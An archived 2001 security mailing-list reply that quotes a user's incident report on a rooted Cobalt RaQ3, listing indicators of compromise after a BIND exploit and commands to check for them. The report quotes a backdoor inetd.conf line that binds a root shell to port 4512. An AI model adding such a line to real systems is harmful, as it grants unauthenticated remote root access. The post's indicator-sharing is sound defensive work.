[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-security] February Hack update

Subject: Re: [cobalt-security] February Hack update
From: Gossi The Dog <gossi@xxxxxxxxxxxxxx>
Date: Mon, 5 Mar 2001 23:44:27 +0000 (GMT)
List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>

Hi,

Do you still have a copy of erkms.tgz?  I'd be interested in a copy if you
do (research - not seen that file on rooted boxes before).  Thanks.

Gossi.



On Sun, 4 Mar 2001 Stoopidcoopid@xxxxxxxxx wrote:

>
> We have finished checking our RAQ3 following a serious root hack in February
> using the Bind exploit. This is what we have found so far by comparing the
> hacked machine with a good machine:
>
> 1) A file called "erkms.tgz" (probably a Trojan rootkit) was found in "/tmp"
> directory. The file had not been executed. A directory called "erkms" was
> also created although it was empty.
>
> Advice: run a check for the "erkms.tgz" file and directories.
> Also check for
>   /dev/hdcc
>   /dev/hdbb
>   /dev/ptyq
> as the presence of these may indicate that the script was at least partly
> executed.
>
>
> 2) A file called "init" was put into the /usr/sbin" directory and a process
> called "init" was activated every 5 minutes by executing the file from
> crontab. Two "init" processes were therefore running at the same time,
> purpose of the new process unknown.
>
> Advice: Check for the "init" file, check your crontab entries and check what
> processes are running. Look for an "init" process other than that found at
> PID1 using "ps -ax".
>
>
> 3) Changes were made to "/etc/rc.d/rc.sysinit" to add the text
> "/usr/sbin/cronlogd" at the end which launches a process
> called "cronlogd", purpose unknown.
>
> Advice: Check the "/etc/rc.d/rc.sysinit" file has not been tampered with and
> what processes are running using "ps -ax".
>
>
> 4) Changes were made to the file "inetd.conf" and also to the file
> "inetd.conf.noqpopper", both found in the "/etc" directory. A new line
> reading "4512 stream tcp nowait root /bin/sh sh -i" was added to both files
> which opens port 4512.
>
> Advice: check what ports you have open using
>
> netstat -ap | grep "*:*"
>
> Check both of the above files have not been tampered with.
>
>
> 5) We have a suspect small text file called "la.pid" in both "root" dir and
> "/usr/sbin" dir. Web security pages suggest this could be an indicator of
> whether malicious code has been properly installed or not. It is not found
> on a good machine.
>
> Advice: Try a "locate la.pid" from the command line. Any advice or updates
> on this file or the other malicious files or processes is welcome.
>
> SC
>
>
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
>

References:
- [cobalt-security] February Hack update
  - From: Stoopidcoopid

Prev by Date: Re: [cobalt-security] February Hack Update
Next by Date: [cobalt-security] 'On my Soap Box'
Previous by thread: [cobalt-security] February Hack update
Next by thread: [cobalt-security] dns server on raq3i

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index